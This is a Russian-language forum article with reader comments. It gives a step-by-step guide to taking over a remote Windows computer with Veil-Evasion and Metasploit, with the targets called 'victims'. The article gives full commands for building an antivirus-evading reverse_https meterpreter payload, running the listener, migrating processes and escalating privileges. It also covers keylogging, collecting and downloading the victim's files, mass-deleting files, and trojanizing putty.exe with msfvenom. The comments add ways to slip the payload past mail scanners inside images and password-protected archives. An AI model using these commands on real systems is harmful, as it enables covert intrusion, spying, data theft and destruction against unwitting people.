Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit

В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit.

UPDATE:
Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil.
https://codeby.net/threads/veil-framework.60978/


Ниже представлена схема, по которой будет осуществляться проникновение.

upload_2016-7-26_15-33-33.png


Необходимые ресурсы:
1. Kali Linux (Я использовал Kali GNU/Linux Rolling)

2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)
3. Veil-Evasion – фреймворк, с помощью которого мы попытаемся обойти антивирус, создадим файл с полезной нагрузкой в формате .exe.

Для начала необходимо установить Veil-Evasion. Чтобы программа создавала корректно работающие файлы, не рекомендую установку apt-get install Veil-Evasion. Фреймворк нужно клонировать c github.com.
Выполните в терминале следующее:
Код:
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
Следим за установкой, соглашаемся и все устанавливаем.

Запускаем файл Veil-Evasion.py из терминала или из папки /root/Veil-Evasion.

upload_2016-7-26_15-34-5.png


Далее вводим команду list – она покажет список доступных payload.

upload_2016-7-26_15-34-57.png


Нас интересует номер 32python/meterpreter/reverse_https

Вводим - use 32

upload_2016-7-26_15-35-15.png


Задаем опции будущему файлу, вводим последовательно следующие команды:

set LHOST 83.199.12.XXX (Ваш публичный IP)

set LPORT 443 (По умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80).

set USE_PYHERION Y (используем энкриптор)

generate (создаем .exe файл)

Вводим имя создаваемого файла.

Выбираем вторую строку, жмем 2.

upload_2016-7-26_15-35-36.png


Ждем успешной генерации файла.

upload_2016-7-26_15-35-57.png


Созданный файл любым путем доставляем на компьютер жертвы. Весит немного, стандартными антивирусами Win7, Win8.1, Win10 не определялся.

Выходим из Veil-Evasion.

Запускаем Metasploit.
#msfconsole

Далее
Код:
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler)  > set LPORT 443
msf exploit (handler) >exploit
Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter>.

upload_2016-7-26_15-37-23.png


Сразу советую мигрировать в другой процесс т.к. файл могут удалить, процесс завершится и т.д.

Делается это так, вводим:
ps – отобразится список активных процессов. Находим , например, explorer, смотрим его PID.

migrate (PID процесса).
Migration completed successfully.
Успех. Теперь необходимо повысить права в системе, команда:
getsystem (срабатывает не всегда.)
В целом поможет разобраться стандартная команда help.
Ниже пару моментов которые помогут быстрее освоиться в системе.

1. Кейлоггер
meterpreter > bgrun keylogrecorder

[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.ххх.ххх_20111024.4455.txt #адрес лога
[*] Recording

meterpreter > bgkill 2 #отключаем кейлогер
[*] Killing background job 2...

2. Скрипт File_collector – позволит создавать список файлов имеющихся в определенном каталоге компьютера жертвы, редактировать его, и скачивать интересующие файлы себе.
Пример:
meterpreter > run file_collector -h
Затем создаем список файлов в одном каталоге:

run file_collector -r -d e:\\ -f * -o /root/ file.txt


Редактируем наш выходной файл, т.к. не все файлы нужны.
cat /root/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst


Скачиваем файлы на свой компьютер.

run file_collector -i /root /file.lst -l /root/

Полагаю не нужно обьяснять, что делают скрипты upload и download)

3. Используя скрипты scrapper и winenum можно собрать информацию о системе, которая сохранится на вашем локальном компьютере.

4. Удаление файлов. Команды вводятся в шелле.
Получаем его слудующим образом:
meterpreter >shell

Удаление файлов exe:
del e:\*.* /f /s /q

удаление файлов doc:
del e:\*.doc /f /s /q


удаление файлов pdf:
del e:\*.pdf /f /s /q


5. Командой приведенной ниже можно добавить payload в любой файл (определяется некоторыми антивирусами) При запуске на компьютере жертвы, откроется сессия meterpreter.

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

Краткое пояснение аргументов команды:
- a 86 - архитектура процессора.
--platform windows - тут понятно.
- x - указать пользовательский исполняемый файл для использования в качестве шаблона.
- k - сохранить поведение шаблона и ввести полезную нагрузку как новый поток.
- p - тип полезной нагрузки.
- e - тип енкодера.
- b - помечаем нулевой байт «плохим», то есть говорим, что его нужно избегать.
- f - формат выходного файла.

За пример взята putty находящаяся в директории /root.
LHOST и LPORT указываем свои.

Приведенный метод, хорошо справляется с взломом Win7, Win8, Win10, вопросы жду в комментариях. Если кто-то умеет криптовать файлы, интересно услышать его мнение.
 
Последнее редактирование:

jsat

Green Team
20.04.2017
30
8
BIT
2
Будут установлены все зависимости.
Достаточно заглянуть в файл setup.sh и посмотреть за что отвечает ключ
-с чистая установка, не проверяет зависимости

# Force clean install of (Wine) Python dependencies
# Bypass environment checks (func_check_env) to force install dependencies
-c|--clean)
Так, что же мне делать, переустановить, я в этом деле новичок
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Еще вопрос по методу, антивиры его палят, насколько я понимаю (загрузил 1 раз в mail облако - он определил вирус). Чтобы скрыть от них, в какую сторону нужно шагать?

Палит структуру файла, тут надо хотя бы в архив закинуть, что бы , хотя бы обеспечить доставку на целевую систему. Еще полезно глнять софтину shellter

https://codeby.net/threads/kak-obxodit-antivirusov-pri-testirovanii-na-proniknovenie-v-sistemu.57665

Кое какую полезную нагрузку можно так отработать
 
  • Нравится
Реакции: valerian38
F

felipo13

не вижу все изображения, потому что не хватает 1 сообщения))) собсно пишу чтобы это исправить)
[doublepost=1495210649,1495210116][/doublepost]почтовики(гугол, мэил) сразу детектят(
 
M

Mr.Lord

а если с apt-get install установил ранее, снести и установить по новой?
 
M

mazard

не так то просто соединить ехе и png файлы чтобы gmail пропустил

Сейчас так попробую в windows (две команды в консоли) (exe в архив (zip, rar), архив в картинку (png, jpg)):

zip archive.zip application.exe
copy /b image.png + archive.zip archive_in_image.png


пользователь должен будет распаковать архивный файл в winrar у себя на целевом компьютере
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Часто используют архивом нагрузку, накидав в папку всего подряд вместе с полезной нагрузкой, далее папку паролят (пароль в теле письма можно указать либо вторым письмом)
 

id2746

Green Team
12.11.2016
436
644
BIT
23
Хочу заметить, что на данный момент Veil-Evasion не совсем корректно устанавливает зависимости на 32bit Debian (и Kali соответственно). Если у вас 32х-битка и ряд скриптов при генерации вываливается с ошибками пути - не удивляйтесь. Для мейнтейнеров Veil эта платформа не является приоритетной, для мейнтейнеров Kali нужно четко локализовать проблему (чем заниматься откровенно лень).

Снимок экрана от 2017-06-06 12-24-49.png

и далее
Снимок экрана от 2017-06-06 12-25-59.png

я так понимаю что данная ошибка связана именно с выбранной архитектурой?


при выборе х32 payload генерируется без проблем.
Снимок экрана от 2017-06-06 12-31-06.png
 
  • Нравится
Реакции: ghostphisher и Vertigo

RaF

One Level
17.06.2017
7
2
BIT
0
Просто напишу

Применены ограничения в отношении аккаунта. Причина: спам. Администратор.
 
Последнее редактирование модератором:
S

smiigo

На некоторых ОС, особенно без актуальных обновлений еще срабатывает (
 
A

aza_fan

Ребята, может кто нибудь мне тупому объяснить как в этом метасплойте зарегаться...ну реально не пойму на последнем этапе что она хочет, на свою почту не дает регать аккаунт
 
V

vanessa

Детект на несливающем сканере 8/39, если все делать как тут
 

Sa1nt

Member
12.09.2016
5
0
BIT
19
спасибо за статью, были примеры еще как на win права поднять подключаясь через web shell
 
X

XyJIuraH66

у меня почему то антивирусом палиться
 

Elektrolife

Green Team
21.10.2016
208
33
BIT
25
Вопрос немного не в тему: как написать скрипт,который будет выполнятся при появлении новой сессии MP ? Чтобы каждый раз не заходить вручную и не делать стандартный набор действий
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Вопрос немного не в тему: как написать скрипт,который будет выполнятся при появлении новой сессии MP ? Чтобы каждый раз не заходить вручную и не делать стандартный набор действий

Вопрос про - что бы запустить метасплоит и не создавать листинер руками? тогда что то типо этого
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.1.5
set LPORT 443
set ExitOnSession false
set EnableStageEncoding true
exploit -j

Или вопрос прилетела нам сессия, а скрипт что то в ней выполнил, к примеру миграцию процесса, залил туда или скачал что то? На 1000 машин зелелтела наша полезная нагрузка, и когда она возвращается, скрипт сам эти тачки обрабатывает? Тогда прийдеться понять тему очень хорошо и писать своим модули. Учим Руби и пишем.
 

Elektrolife

Green Team
21.10.2016
208
33
BIT
25
Вопрос про - что бы запустить метасплоит и не создавать листинер руками? тогда что то типо этого
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.1.5
set LPORT 443
set ExitOnSession false
set EnableStageEncoding true
exploit -j

Или вопрос прилетела нам сессия, а скрипт что то в ней выполнил, к примеру миграцию процесса, залил туда или скачал что то? На 1000 машин зелелтела наша полезная нагрузка, и когда она возвращается, скрипт сам эти тачки обрабатывает? Тогда прийдеться понять тему очень хорошо и писать своим модули. Учим Руби и пишем.



Да,вопрос именно про скрипт с последующими действиями )

Я где то в самом метасплоите натыкался на модуль,который последовательно выполняет действия,описанные в файле. Это не то ? Хотя,всё равно придётся заходить в сессию и запускать модуль..
 

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
Я где то в самом метасплоите натыкался на модуль,который последовательно выполняет действия,описанные в файле. Это не то ? Хотя,всё равно придётся заходить в сессию и запускать модуль..

Скорее всего это и есть сценарий RC, о нем писал выше. А для полного автоматизма со своими задачами только если писать модуль самостоятельно.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!